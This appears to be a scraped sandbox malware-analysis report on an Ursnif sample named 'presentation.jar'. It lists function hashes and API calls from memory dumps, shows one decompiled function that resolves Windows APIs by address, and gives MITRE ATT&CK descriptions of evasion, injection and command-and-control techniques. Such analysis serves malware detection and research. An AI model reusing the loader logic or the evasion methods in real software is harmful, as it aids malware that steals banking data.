Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: e77e708f714d4945b95ba054e17d0a65f64af853014ce37003fc39336a902429
Instruction ID: 2d630f754f5c0f21638dfaf7b04c83746f01a7be65741fee3a22d50b5819243f
Opcode Fuzzy Hash: e77e708f714d4945b95ba054e17d0a65f64af853014ce37003fc39336a902429
Instruction Fuzzy Hash: 9821DEB6600218BFCB51EFE9FC84FAE77BCEB48254F14836AF605D7180D63098428B61

Uniqueness

Uniqueness Score: -1.00%

Function 03EE650A, Relevance: 10.8, APIs: 7, Instructions: 262COMMON

Download Yara Rule

APIs

__isleadbyte_l.LIBCMT ref: 03EE629C
__aulldvrm.LIBCMT ref: 03EE6601
_write_multi_char.LIBCMT ref: 03EE66CE
_write_string.LIBCMT ref: 03EE66E2
_write_multi_char.LIBCMT ref: 03EE66FB
_write_multi_char.LIBCMT ref: 03EE6779

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: _write_multi_char$__aulldvrm__isleadbyte_l_write_string
String ID:
API String ID: 2598234172-0
Opcode ID: 7dfbd0aacbc0f958874334af8e5c5006d4d7d92ce762ff7b758bc9773f6694f9
Instruction ID: 40d1aceb31399e9301de44c6a31e959e5aa4742d1fa0ae32869b90a35cc6ef46
Opcode Fuzzy Hash: 7dfbd0aacbc0f958874334af8e5c5006d4d7d92ce762ff7b758bc9773f6694f9
Instruction Fuzzy Hash: C1A18C71D1034ECBDF20CFA8D9447EDBBB4AF2431CF286269D9217A294D7749A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03EE4237, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 03EE4255

Part of subcall function 03EE83C2: __mtinitlocknum.LIBCMT ref: 03EE83D6
Part of subcall function 03EE83C2: __amsg_exit.LIBCMT ref: 03EE83E2
Part of subcall function 03EE83C2: RtlEnterCriticalSection.NTDLL(?), ref: 03EE83EA

___sbh_find_block.LIBCMT ref: 03EE4260
___sbh_free_block.LIBCMT ref: 03EE426F
HeapFree.KERNEL32(00000000,00000001,03F40D30,0000000C,03EE83A3,00000000,03F40DE8,0000000C,03EE83DB,00000001,?,?,03EF6C04,00000004,03F412B8,0000000C), ref: 03EE429F
GetLastError.KERNEL32(?,03EF6C04,00000004,03F412B8,0000000C,03EEB5B4,00000000,00000000,00000000,00000000,00000000,03EEAFC8,00000001,00000214), ref: 03EE42B0

Strings

Uxt, xrefs: 03EE429F

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID: Uxt
API String ID: 2714421763-1536154274
Opcode ID: 57a349a807907f1120eb2d2f64906000b4b33ffc116f037c9832d4c4782ba70c
Instruction ID: 31df2497b66f6071b1d723081360215038417f82c39b7ca79177ea7c5c0345d3
Opcode Fuzzy Hash: 57a349a807907f1120eb2d2f64906000b4b33ffc116f037c9832d4c4782ba70c
Instruction Fuzzy Hash: D8018175900315AEDF20FFB2A908B5E7BB8AF05768F246359E518AE0C0DF38D580CE64

Uniqueness

Uniqueness Score: -1.00%

Function 03ED1AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03ED1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E03ED1C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x3ed41d0 + 0x3ed5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x3ed41d0 + 0x3ed50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E03ED136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x3ed41d0 + 0x3ed50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x3ed41d0 + 0x3ed5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x3ed41d0 + 0x3ed5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x3ed41d0 + 0x3ed512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E03ED18D1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x03ed1ab3
0x03ed1ab7
0x03ed1b78
0x03ed1abd
0x03ed1ad5
0x03ed1ae4
0x03ed1aeb
0x03ed1aef
0x03ed1af2
0x03ed1b70
0x03ed1b71
0x03ed1af4
0x03ed1b01
0x03ed1b05
0x03ed1b08
0x00000000
0x03ed1b0a
0x03ed1b17
0x03ed1b1b
0x03ed1b1e
0x00000000
0x03ed1b20
0x03ed1b2d
0x03ed1b31
0x03ed1b34
0x00000000
0x03ed1b36
0x03ed1b43
0x03ed1b47
0x03ed1b4a
0x00000000
0x03ed1b4c
0x03ed1b52
0x03ed1b58
0x03ed1b5d
0x03ed1b64
0x03ed1b67
0x00000000
0x03ed1b69
0x03ed1b6c
0x03ed1b6c
0x03ed1b67
0x03ed1b4a
0x03ed1b34
0x03ed1b1e
0x03ed1b08
0x03ed1af2
0x03ed1b86

APIs

Part of subcall function 03ED1C8F: HeapAlloc.KERNEL32(00000000,?,03ED117D,?,00000000,00000000,?,?,?,03ED1810), ref: 03ED1C9B

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,03ED1272,?,?,?,?), ref: 03ED1AC9
GetProcAddress.KERNEL32(00000000,?), ref: 03ED1AEB
GetProcAddress.KERNEL32(00000000,?), ref: 03ED1B01
GetProcAddress.KERNEL32(00000000,?), ref: 03ED1B17
GetProcAddress.KERNEL32(00000000,?), ref: 03ED1B2D
GetProcAddress.KERNEL32(00000000,?), ref: 03ED1B43

Part of subcall function 03ED18D1: memset.NTDLL ref: 03ED1950

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: d6701c2fd283f9f1846ebd80321d2f1f80a5bed4504278fa8e5f4f73a1e91f76
Instruction ID: f5c8b042cf5b81acbef7db7112fa84b4b08a2fd5ea990a57ee0422621943a89f
Opcode Fuzzy Hash: d6701c2fd283f9f1846ebd80321d2f1f80a5bed4504278fa8e5f4f73a1e91f76
Instruction Fuzzy Hash: DC2160B150131ADFC790EF6AE880E5B7BFCEB15288B055725E845C7291E730E912CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03EEA679, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

csm, xrefs: 03EEA6B3
MOC, xrefs: 03EEA69F
csm, xrefs: 03EEA76B

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID: MOC$csm$csm
API String ID: 0-2232927589
Opcode ID: 9a751069da1ca90159670499d863a10cd5c3665d7a054ee3be1b5662053c20d1
Instruction ID: 17b85bbe2e9c62c4185f1c6daba0aa0ffd8b654c93e3cdd09f10df678d4a150a
Opcode Fuzzy Hash: 9a751069da1ca90159670499d863a10cd5c3665d7a054ee3be1b5662053c20d1
Instruction Fuzzy Hash: DE318D355002059FDF30DFA8C8847A9B3F8AF44209F5D6ABEE8558B211D734E584AB92

Uniqueness

Uniqueness Score: -1.00%

Function 03EE20C0, Relevance: 6.2, APIs: 4, Instructions: 190COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 03EE20E7

Part of subcall function 03EE2E20: __EH_prolog3.LIBCMT ref: 03EE2E27
Part of subcall function 03EE2E20: std::_Lockit::_Lockit.LIBCPMT ref: 03EE2E3B
Part of subcall function 03EE2E20: std::locale::_Setgloballocale.LIBCPMT ref: 03EE2E74

std::_Lockit::_Lockit.LIBCPMT ref: 03EE20FD
GetWindowsDirectoryA.KERNEL32 ref: 03EE212B
std::_Lockit::_Lockit.LIBCPMT ref: 03EE2308

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$std::locale::_$DirectoryH_prolog3InitSetgloballocaleWindows
String ID:
API String ID: 2221243735-0
Opcode ID: c434fab3387cba6590b6495e66878231e5acdaeda824c486a08f6f4943c41fb2
Instruction ID: 938346bbb69d121782f9334bce8589ff5ca801c7c5c6b4d9927cd48ceaab7b59
Opcode Fuzzy Hash: c434fab3387cba6590b6495e66878231e5acdaeda824c486a08f6f4943c41fb2
Instruction Fuzzy Hash: 0B71E3BA9042049BCB14EF3CE9A066977F8FB98314F044E3EE95697398D734A508CF91

Uniqueness

Uniqueness Score: -1.00%

Function 03EF2996, Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,03F04288,00000001,?,00000100,?,?,?,?,?,03EF2BFE,?,?,?,?,?), ref: 03EF2A45
GetLastError.KERNEL32(?,03EF2BFE,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03EF2A57
_malloc.LIBCMT ref: 03EF2AF1
_memset.LIBCMT ref: 03EF2B11
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 03EF2B34
__freea.LIBCMT ref: 03EF2B3E
___ansicp.LIBCMT ref: 03EF2B68

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: StringType$ErrorLast___ansicp__freea_malloc_memset
String ID:
API String ID: 1764942736-0
Opcode ID: 032c258f287528543ba9db7656696224d9306141f3e734473d3af96957d5b8d9
Instruction ID: b475d4d01bdc23492912a07a6d39da8fe5ed5b6a248f55e6c4cafeea0426a6f8
Opcode Fuzzy Hash: 032c258f287528543ba9db7656696224d9306141f3e734473d3af96957d5b8d9
Instruction Fuzzy Hash: 62512776A4010BDFDB10EFA5CCC1ADA77F5EB14294B580624EA04DB204E7BA9961CF80

Uniqueness

Uniqueness Score: -1.00%

Function 03EF44C2, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03EF44F2
__isleadbyte_l.LIBCMT ref: 03EF4526
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,03EFDF0D,?,?,00000002), ref: 03EF4557
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,03EFDF0D,?,?,00000002), ref: 03EF45C5

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 37d34f92e02af7977e1bcf3a442746f2443952460d86037de862f996a6ecb338
Instruction ID: 32a4cd7a43c077c08f9effc161f36f3896bfc164e21a763bf5a1ac6fafa4f746
Opcode Fuzzy Hash: 37d34f92e02af7977e1bcf3a442746f2443952460d86037de862f996a6ecb338
Instruction Fuzzy Hash: 7E31F435A00256EFDF21EFA5C8809BFBBB5BF01218F0956A9E6619B1D1EB70D940CF10

Uniqueness

Uniqueness Score: -1.00%

Function 03EEF05E, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 03EEB016: __getptd_noexit.LIBCMT ref: 03EEB017
Part of subcall function 03EEB016: __amsg_exit.LIBCMT ref: 03EEB024

__amsg_exit.LIBCMT ref: 03EEF08A
__lock.LIBCMT ref: 03EEF09A
InterlockedDecrement.KERNEL32(?), ref: 03EEF0B7
InterlockedIncrement.KERNEL32(03F44F18), ref: 03EEF0E2

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 114d359292fe59ac177f5ac2555d6121d2ec02f6402c8e0566d02e15b8dfe460
Instruction ID: 834658f6bdc0ab3aa342a3f460d1cb59fd956f67e38f43c605bd75bc22f81ba8
Opcode Fuzzy Hash: 114d359292fe59ac177f5ac2555d6121d2ec02f6402c8e0566d02e15b8dfe460
Instruction Fuzzy Hash: 9001003AD00B199BCB20EB66940035DB3B0BB40726F0A6304E8147B2C4C730AA42CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 03EE34E4, Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 03EE34EC

Part of subcall function 03EE9B05: __NMSG_WRITE.LIBCMT ref: 03EE9B2C
Part of subcall function 03EE9B05: __NMSG_WRITE.LIBCMT ref: 03EE9B36

__NMSG_WRITE.LIBCMT ref: 03EE34F3

Part of subcall function 03EE9945: _strcpy_s.LIBCMT ref: 03EE99B1
Part of subcall function 03EE9945: __invoke_watson.LIBCMT ref: 03EE99C2
Part of subcall function 03EE9945: GetModuleFileNameA.KERNEL32(00000000,0404A0E1,00000104,03EEAFC8,00000001,00000214), ref: 03EE99DE
Part of subcall function 03EE9945: _strcpy_s.LIBCMT ref: 03EE99F3
Part of subcall function 03EE9945: __invoke_watson.LIBCMT ref: 03EE9A06
Part of subcall function 03EE9945: _strlen.LIBCMT ref: 03EE9A0F
Part of subcall function 03EE9945: _strlen.LIBCMT ref: 03EE9A1C
Part of subcall function 03EE9945: __invoke_watson.LIBCMT ref: 03EE9A49

Part of subcall function 03EE9565: ___crtCorExitProcess.LIBCMT ref: 03EE9569
Part of subcall function 03EE9565: ExitProcess.KERNEL32 ref: 03EE9573

RtlAllocateHeap.NTDLL(00000000,?), ref: 03EE3520
RtlAllocateHeap.NTDLL(00000000,?), ref: 03EE3550

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: __invoke_watson$AllocateExitHeapProcess_strcpy_s_strlen$FileModuleName___crt
String ID:
API String ID: 4108966708-0
Opcode ID: fa09c107a3b3976f69b51cfca55fcae0af1737522c8b1109a5fbe34e6334193e
Instruction ID: 40a3266aea80b165baf0019b18eb0e738fc4b80e4ecb57d455d1259dba0ea6f6
Opcode Fuzzy Hash: fa09c107a3b3976f69b51cfca55fcae0af1737522c8b1109a5fbe34e6334193e
Instruction Fuzzy Hash: 55F08B3A644211BAEE32FA24BD04B5E376CEF40324F252264FC24FB2C2D724EC848995

Uniqueness

Uniqueness Score: -1.00%

Function 03EE494A, Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 03EEB016: __getptd_noexit.LIBCMT ref: 03EEB017
Part of subcall function 03EEB016: __amsg_exit.LIBCMT ref: 03EEB024

__calloc_crt.LIBCMT ref: 03EE495F

Part of subcall function 03EEB5A1: __calloc_impl.LIBCMT ref: 03EEB5AF
Part of subcall function 03EEB5A1: Sleep.KERNEL32(00000000,03EEAFC8,00000001,00000214), ref: 03EEB5C6

__lock.LIBCMT ref: 03EE4995
___addlocaleref.LIBCMT ref: 03EE49A1
InterlockedIncrement.KERNEL32(?), ref: 03EE49B6

Part of subcall function 03EE5B1F: __getptd_noexit.LIBCMT ref: 03EE5B1F

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: __getptd_noexit$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl__lock
String ID:
API String ID: 1017034129-0
Opcode ID: 20882d3600dde57dd2caeb3e734d864121924423ec44959ef5526bec7f568938
Instruction ID: 1797b90eec91494a49daf919a0f71b23910a7b4b0df7c651ef305aebd67fa8b8
Opcode Fuzzy Hash: 20882d3600dde57dd2caeb3e734d864121924423ec44959ef5526bec7f568938
Instruction Fuzzy Hash: FEF0AF39508316EFEB20FBB4880171CB7E0AF01751F106358E495AF2C0CF7199408B65

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report presentation.jar

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Function 03ED17A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 03ED1E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 03ED1CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 03ED15A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 03ED1D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 03ED146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 03ED1566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 03ED1F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 03ED2485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 03ED2264, Relevance: .1, Instructions: 77
COMMONCrypto

Function 03ED1979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 03ED1AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON